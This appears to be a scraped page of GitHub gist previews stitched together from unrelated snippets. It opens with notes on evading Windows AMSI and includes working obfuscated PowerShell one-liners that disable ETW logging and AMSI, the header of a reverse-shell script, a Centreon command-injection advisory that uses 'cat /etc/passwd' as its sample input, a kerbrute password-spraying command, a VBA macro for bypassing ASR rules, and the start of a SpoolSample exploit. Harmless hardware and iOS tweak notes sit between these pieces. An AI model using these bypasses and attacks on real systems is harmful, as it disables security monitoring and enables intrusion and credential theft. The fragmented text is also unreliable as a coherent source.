To perform all this techniques you can simply try them by typing "Invoke-Mimikatz" into your powershell terminal, you'll notice that even if you haven't imported Mimikatz it will detect that as malicious. But if the AMSI is off or you avoid it, it just will say that "it's not recognized as the name of a cmdlet", so you could say that you've bypassed the AMSI
However some methods may be detected by the AV but most of them actually work without problem
The first and worst way to bypass AMSI is downgrading powershell version to 2.0.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<# | |
DynWin32-ReverseShell.ps1 is a reverse shell based on dynamically looked up Win32 API calls. | |
The script uses reflection to obtain access to GetModuleHandle, GetProcAddress and CreateProcess. | |
Afterwards it uses GetModuleHandle and GetProcAddress to resolve the required WSA functions | |
from ws2_32.dll. | |
This script should be used for educational purposes only (and maybe while playing CTF :D). | |
It was only tested on Windows 10 (x64) and is probably not stable or portable. It's only | |
purpose is to demonstrate the usage of reflective lookups of Win32 API calls. See it as |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Logging bypass: | |
(({}).gettype())."aSs`emblY"."Getty`PE"(('System.Manage'+'ment.Automati'+'on.Trac'+'ing.P'+'SEtwL'+'og'+'Pro'+'vi'+'d'+'e'+'r'))."gEtf`ieLD"(('etwProvi'+'de'+'r'),('Non'+'P'+'ublic,Static'))."Se`TVAL`Ue"($null,(New-Object System.Diagnostics.Eventing.EventProvider(New-Guid))) | |
# AMSI Bypass (old, burned) | |
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} ) | |
# New AMSI bypass obfuscation: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Centreon 19.04 allows attackers to execute arbitrary OS commands via the Command Line field | |
of main.php?p=60807&type=4 (aka the Configuration > Commands > Discovery screen). | |
------------------------------------------ | |
[Additional Information] | |
Once one has logged into Centreon: | |
1. navigate to: Configuration > Commands > Discovery OR http://ip-address/centreon/main.php?p=60807&type=4 | |
2. in the "Command Line" section put a command: e.g. "cat /etc/passwd" without quotes. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Preface: | |
I have no idea if any of this is the "right" way of doing it. This is just how I got my unit working. | |
Good luck. | |
WARNING: Do not use a V1 Waveshare display module with a stock pwnagotchi! The pwnagotchi expects a V2 module, and may irreparably damage a V1 module! | |
A V1 display module *can* work, but you must modify `waveshare.py` and `display.py` beforehand. For the time being, this is left as an exercise for the reader. | |
If you have already burnt a V1 display, try disconnecting it from the Pi and leaving it overnight. This may rejuvenate the display somewhat, but it will likely still display signs of damage. | |
Installation: | |
1. `dd` Raspbian Lite to an SD card. |
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
' ASR rules bypass creating child processes | |
' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction | |
' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office | |
' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule | |
Sub ASR_blocked() | |
Dim WSHShell As Object | |
Set WSHShell = CreateObject("Wscript.Shell") | |
WSHShell.Run "cmd.exe" | |
End Sub |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# abuse cases and better implementation from the original discoverer: https://github.com/leechristensen/SpoolSample | |
# some code from https://www.exploit-db.com/exploits/2879/ | |
import os | |
import sys | |
import argparse | |
import binascii | |
import ConfigParser |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This tweak is useless without following the steps below. | |
Description: Use your Apple Watch to respring/reboot/safemode your connected device. | |
You can download the ipa file here: https://mega.nz/#!8qgRjJCA!CZjS2FiZ1wKpq5oBZt-MXOxK_kcGOYAvwur_QFh8o7g | |
Then re-sign with cert only (no prov profile) with iOS App Signer found here: http://dantheman827.github.io/ios-app-signer/ | |
Then install with xCode>Window>Devices&Simulators>Connected Device>+ | |
Then install the "Core WatchUtils" dependency from my beta repo here: https://cokepokes.github.io/ & respring. |
NewerOlder